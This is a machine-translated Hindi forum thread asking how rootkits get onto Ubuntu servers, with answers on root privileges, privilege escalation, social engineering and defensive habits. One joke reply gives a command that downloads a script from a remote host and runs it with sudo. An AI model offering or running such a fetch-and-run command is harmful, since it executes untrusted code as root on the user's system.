Ubuntu सर्वर पर rootkits कैसे स्थापित होते हैं?

11

मैंने रूटकिट्स के लिए जाँच करने पर कुछ पोस्ट देखे हैं, लेकिन वे किसी भी जानकारी को खोजने में सक्षम नहीं हैं कि वे एक लिनक्स सिस्टम पर कैसे प्राप्त करते हैं। विशेष रूप से यदि आप एक php वेब साइट में बग का शोषण करते हैं (हाँ, मैं यहां ड्रूपजेडन के बारे में बात कर रहा हूं ) तो क्या रूटकिट को स्थापित करना संभव है, भले ही आप केवल वेब-सर्वर (www-डेटा) के रूप में चला सकते हैं और रूट के रूप में नहीं। बहुत कम जानकारी के बारे में मैंने पाया है कि ये कैसे स्थापित किए गए हैं, आपको पता चलता है कि आपको इन्हें स्थापित करने के लिए रूट होना होगा ( यहाँ देखें )।

server security

— लांस हॉलैंड
स्रोत

6

मैंने एक छोटा सा लिखा है, आप चाहें तो इसे स्थापित कर सकते हैं बस टाइप करेंwget http://mydomain/script.sh;sudo ./script.sh

— नन्ने

1

ओह, मैं इस प्रतिक्रिया की प्रतीक्षा कर रहा था!

— हत्यारे

9

यदि यह मैं था तो मैं निम्नलिखित विधि अपनाऊंगा:

सॉफ़्टवेयर का एक टुकड़ा डाउनलोड करने और स्थापित करने के लिए एक उपयोगकर्ता प्राप्त करें (# 1)। उस सॉफ़्टवेयर को इच्छित सॉफ़्टवेयर स्थापित करें। उस एप्लिकेशन के अंदर एक बिनैरी ब्लॉब छिपाएं, आपको सॉफ़्टवेयर डाउनलोड करने देता है (यानी, एक उपकरण जिसका उपयोग आप ftp, wget आदि के लिए कर सकते हैं)।
व्यवस्थापक खाते (# 2) के लिए प्रॉम्प्ट करें और एक ftp का उपयोग करने के लिए, rootkit को डाउनलोड करने और स्थापित करने के लिए उदाहरण के लिए उपयोग करें।

# 1 के बारे में: एक उपयोगकर्ता को लिनक्स का उपयोग करते समय कभी भी यादृच्छिक सॉफ्टवेयर डाउनलोड नहीं करना चाहिए; सॉफ्टवेयर स्थापित करने के लिए उपयुक्त चैनल (उबंटू सॉफ्टवेयर सेंटर) का उपयोग करें। यदि यह सॉफ्टवेयर है जिसे उपयुक्त चैनलों के बाहर डाउनलोड करने की आवश्यकता है, तो सुनिश्चित करें कि डाउनलोड के स्रोत पर भरोसा किया जा सकता है। अपाचे सॉफ्टवेयर या MySQL के नवीनतम संस्करणों पर विचार करें। उस एप्लिकेशन की अखंडता के बारे में अलग-अलग सोशल मीडिया की जांच किए बिना यादृच्छिक सॉफ़्टवेयर डाउनलोड करने के आसपास न जाएं। Microsoft ने कभी सॉफ्टवेयर को केंद्रीकृत नहीं किया; इसके परिणामस्वरूप बहुत सारे लोग सॉफ्टवेयर के साथ डबिंग करते हैं, इसलिए उनका उपयोगकर्ता आधार ह्यूग है, लेकिन इससे कंप्यूटर में प्रवेश करना आसान हो गया है और वे डेटा इकट्ठा करना शुरू कर सकते हैं जो वे बेच सकते हैं।

# 2 के बारे में: घातक उपयोगकर्ता दोष। कभी भी कभी भी अपने व्यवस्थापक पासवर्ड में कभी भी टाइप न करें जब तक कि आपको पता न हो कि यह क्यों पूछा गया है।

— Rinzwind
स्रोत

8

हाँ, रूटकिट स्थापित करने के लिए सामान्य रूट अनुमति की आवश्यकता होती है। रूटकिट में से कई में एक मॉड्यूल होता है जिसे कर्नेल में लोड किया जाता है, अन्य बस ओवरराइट टूल आमतौर पर रूट द्वारा उपयोग किया जाता है। एक ठीक से सेट और सही सिस्टम में रूट विशेषाधिकार के बिना रूट किट को स्थापित करने का कोई तरीका नहीं होगा, लेकिन ...

... सिस्टम कॉन्फ़िगरेशन के साथ समस्याएँ हो सकती हैं जो सिस्टम को असुरक्षित बनाती हैं। ... सुरक्षा कीड़े हो सकते हैं जो एक विशेषाधिकार उत्थान की अनुमति देते हैं ... किसी उपयोगकर्ता को कुछ बुराई चलाने के लिए रूट अनुमतियों के साथ छल करने के तरीके हो सकते हैं।

तरीके घुसपैठियों की कल्पना के रूप में असीमित हैं।

— क्लाउस डी।
स्रोत